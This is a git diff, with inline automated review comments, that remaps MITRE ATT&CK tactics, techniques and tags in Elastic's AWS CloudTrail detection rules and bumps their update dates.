+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: Amazon CloudWatch", "Use Case: Log Auditing", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -138,34 +129,21 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1485"
-name = "Data Destruction"
-reference = "https://attack.mitre.org/techniques/T1485/"
-
-[rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1562.008"
+name = "Disable or Modify Cloud Logs"
+reference = "https://attack.mitre.org/techniques/T1562/008/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml b/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml
index 0aa53f8fd0e..59ca5c226e9 100644
--- a/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml
+++ b/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/06/05"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -107,14 +107,7 @@ references = [
 risk_score = 47
 rule_id = "bb9b13b2-1700-48a8-a750-b43b0a72ab69"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS EC2",
- "Tactic: Impact",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -125,22 +118,21 @@ event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.acti
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1565"
-name = "Data Manipulation"
-reference = "https://attack.mitre.org/techniques/T1565/"
-[[rule.threat.technique.subtechnique]]
-id = "T1565.001"
-name = "Stored Data Manipulation"
-reference = "https://attack.mitre.org/techniques/T1565/001/"
+[[rule.threat.technique]]
+id = "T1578"
+name = "Modify Cloud Compute Infrastructure"
+reference = "https://attack.mitre.org/techniques/T1578/"
+[[rule.threat.technique.subtechnique]]
+id = "T1578.005"
+name = "Modify Cloud Compute Configurations"
+reference = "https://attack.mitre.org/techniques/T1578/005/"
 [rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml b/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml
index 1221591ba53..6bc872fe7e4 100644
--- a/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml
+++ b/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/06/02"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -116,22 +116,16 @@ info where event.dataset == "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1485"
-name = "Data Destruction"
-reference = "https://attack.mitre.org/techniques/T1485/"
 [[rule.threat.technique]]
 id = "T1490"
 name = "Inhibit System Recovery"
 reference = "https://attack.mitre.org/techniques/T1490/"
-
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml b/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml
index 2a685166ca7..47d2cd2bd7c 100644
--- a/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml
+++ b/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/26"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -93,16 +93,7 @@ references = [
 risk_score = 47
 rule_id = "d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS CloudTrail",
- "Data Source: AWS IAM",
- "Resources: Investigation Guide",
- "Tactic: Impact",
- "Tactic: Persistence",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS CloudTrail", "Data Source: AWS IAM", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -116,34 +107,39 @@ event.dataset: aws.cloudtrail
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1531"
-name = "Account Access Removal"
-reference = "https://attack.mitre.org/techniques/T1531/"
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+[[rule.threat.technique.subtechnique]]
+id = "T1556.006"
+name = "Multi-Factor Authentication"
+reference = "https://attack.mitre.org/techniques/T1556/006/"
 [rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1556"
 name = "Modify Authentication Process"
 reference = "https://attack.mitre.org/techniques/T1556/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1556.006"
 name = "Multi-Factor Authentication"
 reference = "https://attack.mitre.org/techniques/T1556/006/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml b/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml
index d12ddb1dc74..3a697f610ce 100644
--- a/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml
+++ b/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/28"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -101,15 +101,7 @@ references = [
 risk_score = 47
 rule_id = "f6652fb5-cd8e-499c-8311-2ce2bb6cac62"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS RDS",
- "Resources: Investigation Guide",
- "Use Case: Threat Detection",
- "Tactic: Impact",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS RDS", "Resources: Investigation Guide", "Use Case: Threat Detection"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -124,17 +116,16 @@ any where event.dataset == "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1485"
-name = "Data Destruction"
-reference = "https://attack.mitre.org/techniques/T1485/"
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
 [rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
-
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/impact_rds_snapshot_deleted.toml b/rules/integrations/aws/impact_rds_snapshot_deleted.toml
index 7e6e4313c9b..dfd3f15f6b9 100644
--- a/rules/integrations/aws/impact_rds_snapshot_deleted.toml
+++ b/rules/integrations/aws/impact_rds_snapshot_deleted.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/29"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -154,17 +154,16 @@ any where event.dataset == "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1485"
-name = "Data Destruction"
-reference = "https://attack.mitre.org/techniques/T1485/"
+[[rule.threat.technique]]
+id = "T1490"
+name = "Inhibit System Recovery"
+reference = "https://attack.mitre.org/techniques/T1490/"
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml b/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml
index 36ccc844da3..daebbd7abb6 100644
--- a/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml
+++ b/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/04/17"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/02/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -148,18 +148,18 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1485"
-name = "Data Destruction"
-reference = "https://attack.mitre.org/techniques/T1485/"
 [[rule.threat.technique]]
-id = "T1486"
-name = "Data Encrypted for Impact"
-reference = "https://attack.mitre.org/techniques/T1486/"
+id = "T1565"
+name = "Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1565.001"
+name = "Stored Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/001/"
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
diff --git a/rules/integrations/aws/initial_access_console_login_root.toml b/rules/integrations/aws/initial_access_console_login_root.toml
index a8842b9754b..df37ae1e4e8 100644
--- a/rules/integrations/aws/initial_access_console_login_root.toml
+++ b/rules/integrations/aws/initial_access_console_login_root.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/06/11"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -95,16 +95,7 @@ references = ["https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.htm
 risk_score = 47
 rule_id = "e2a67480-3b79-403d-96e3-fdd2992c50ef"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS Sign-In",
- "Use Case: Identity and Access Audit",
- "Resources: Investigation Guide",
- "Tactic: Initial Access",
- "Tactic: Privilege Escalation",
-]
+tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Sign-In", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -133,10 +124,12 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1078.004"
 name = "Cloud Accounts"
@@ -146,19 +139,3 @@ reference = "https://attack.mitre.org/techniques/T1078/004/"
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/aws/initial_access_password_recovery.toml b/rules/integrations/aws/initial_access_password_recovery.toml
index 32b17765f99..2858c38caf0 100644
--- a/rules/integrations/aws/initial_access_password_recovery.toml
+++ b/rules/integrations/aws/initial_access_password_recovery.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/07/02"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -123,16 +123,3 @@ field_names = [
 "aws.cloudtrail.response_elements"
 ]
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
diff --git a/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml b/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml
index 7a3ec1d8500..889051ca438 100644
--- a/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml
+++ b/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/04/30"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
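Review bot: The `@@ -123,16 +123,3 @@` hunk deletes the only `[[rule.threat]]` block of `initial_access_password_recovery.toml` and adds nothing in its place, so the rule is left with no ATT&CK tactic or technique and drops out of coverage reporting; if the old T1078 / Initial Access mapping was judged wrong, a replacement mapping should be written here rather than removing the section outright. The file's `tags` list is not part of this diff, so if it still carries `Tactic: Initial Access` a tag-to-tactic consistency check would now report it as an orphan tag, and the file also keeps its `initial_access_` name prefix with no tactic to back it. Either restoring a mapping or stating in the commit message why this rule is intentionally unmapped would make the intent reviewable.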
@@ -67,16 +67,7 @@ references = [ risk_score = 47 rule_id = "873b5452-074e-11ef-852e-f661ea17fbcc" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EC2", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -106,36 +97,18 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.004" name = "SSH Authorized Keys" reference = "https://attack.mitre.org/techniques/T1098/004/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml b/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml index e8de6075067..ffdeb1c355e 100644 --- a/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml +++ b/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml 
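Review bot: The `@@ -106,36 +97,18 @@` hunk drops the Lateral Movement entry (T1021 / T1021.004) and remaps the rule to Persistence only, yet the file remains lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml; if the filename prefix is meant to reflect the primary tactic, the rename should travel with the mapping change, otherwise anyone browsing the directory gets a stale signal about what the rule covers. Since `rule_id` is the stable identifier, a rename does not affect rule consumers. The same prefix-versus-tactic drift appears elsewhere in this patch: persistence_ec2_network_acl_creation.toml, persistence_ec2_route_table_modified_or_deleted.toml, persistence_ec2_security_group_configuration_change_detection.toml and persistence_iam_api_calls_via_user_session_token.toml now map only to Defense Evasion, persistence_iam_oidc_provider_created.toml only to Privilege Escalation, and lateral_movement_sns_topic_message_publish_by_rare_user.toml only to Exfiltration.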
@@ -2,7 +2,7 @@ creation_date = "2024/07/24" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -97,19 +97,7 @@ references = [ risk_score = 73 rule_id = "d1e5e410-3e34-412e-9b1f-dd500b3b55cd" severity = "high" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS EC2", - "Data Source: AWS STS", - "Data Source: AWS Sign-In", - "Use Case: Identity and Access Audit", - "Tactic: Lateral Movement", - "Tactic: Credential Access", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Data Source: AWS STS", "Data Source: AWS Sign-In", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -125,66 +113,39 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.007" -name = "Cloud Services" -reference = "https://attack.mitre.org/techniques/T1021/007/" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" -[[rule.threat.technique.subtechnique]] -id = "T1552.005" -name = "Cloud Instance Metadata API" -reference = "https://attack.mitre.org/techniques/T1552/005/" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.007" +name = "Cloud Services" +reference = "https://attack.mitre.org/techniques/T1021/007/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" 
-reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml b/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml index 2cb48308925..25f18611e04 100644 --- a/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml +++ b/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["aws"] maturity = "production" -updated_date = "2025/09/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -98,17 +98,7 @@ risk_score = 47 rule_id = "2112ecce-cd34-11ef-873f-f661ea17fbcd" setup = "AWS SNS topic data event types need to be enabled in the CloudTrail trail configuration to capture the Publish action. Ensure that the AWS CloudTrail service is [configured](https://docs.aws.amazon.com/sns/latest/dg/logging-using-cloudtrail.html#cloudtrail-data-events) to log data events for SNS." severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS SNS", - "Use Case: Threat Detection", - "Resources: Investigation Guide", - "Tactic: Lateral Movement", - "Tactic: Exfiltration", - "Tactic: Impact", -] +tags = ["Domain: Cloud", "Tactic: Exfiltration", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS SNS", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" 
@@ -140,46 +130,16 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1534" -name = "Internal Spearphishing" -reference = "https://attack.mitre.org/techniques/T1534/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1496" -name = "Resource Hijacking" -reference = "https://attack.mitre.org/techniques/T1496/" -[[rule.threat.technique.subtechnique]] -id = "T1496.004" -name = "Cloud Service Hijacking" -reference = "https://attack.mitre.org/techniques/T1496/004/" - - - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name", "aws.cloudtrail.resources.arn"] diff --git a/rules/integrations/aws/ml_cloudtrail_error_message_spike.toml b/rules/integrations/aws/ml_cloudtrail_error_message_spike.toml index 1fb11e95294..4d5ee39cd2f 100644 --- a/rules/integrations/aws/ml_cloudtrail_error_message_spike.toml +++ b/rules/integrations/aws/ml_cloudtrail_error_message_spike.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 
@@ -112,37 +112,3 @@ tags = [ ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat.technique]] -id = "T1526" -name = "Cloud Service Discovery" -reference = "https://attack.mitre.org/techniques/T1526/" - -[[rule.threat.technique]] -id = "T1580" -name = "Cloud Infrastructure Discovery" -reference = "https://attack.mitre.org/techniques/T1580/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/aws/ml_cloudtrail_rare_error_code.toml b/rules/integrations/aws/ml_cloudtrail_rare_error_code.toml index f428b4da9a8..9f64ead7e86 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_error_code.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_error_code.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 
@@ -114,61 +114,3 @@ tags = [ ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat.technique]] -id = "T1526" -name = "Cloud Service Discovery" -reference = "https://attack.mitre.org/techniques/T1526/" - -[[rule.threat.technique]] -id = "T1580" -name = "Cloud Infrastructure Discovery" -reference = "https://attack.mitre.org/techniques/T1580/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml b/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml index 2634447e6ad..7093cd7002b 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_method_by_city.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 
@@ -106,24 +106,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "809b70d3-e2c3-455e-af1b-2626a5a1a276" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: AWS", "Data Source: Amazon Web Services", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -134,3 +122,7 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/aws/ml_cloudtrail_rare_method_by_country.toml b/rules/integrations/aws/ml_cloudtrail_rare_method_by_country.toml index c961ff23bf9..149e4f75951 100644 --- a/rules/integrations/aws/ml_cloudtrail_rare_method_by_country.toml +++ b/rules/integrations/aws/ml_cloudtrail_rare_method_by_country.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/13" integration = ["aws"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 
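Review bot: In the `@@ -134,3 +122,7 @@` hunk the four added `[rule.threat.tactic]` lines follow the sub-technique `reference` line directly; the `-134,3` count leaves no room for a blank context line, so the tactic table is appended with no separator, whereas the ml_cloudtrail_rare_method_by_user.toml hunk reuses an existing `[rule.threat.tactic]` line that is preceded by a blank line. Three near-identical files normalised in the same commit should end up formatted the same way; I would add a `+` blank line before `+[rule.threat.tactic]` here and in ml_cloudtrail_rare_method_by_country.toml. The move of the tactic table after the technique list is otherwise fine, since TOML attaches `[rule.threat.tactic]` to the enclosing `[[rule.threat]]` element regardless of position.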
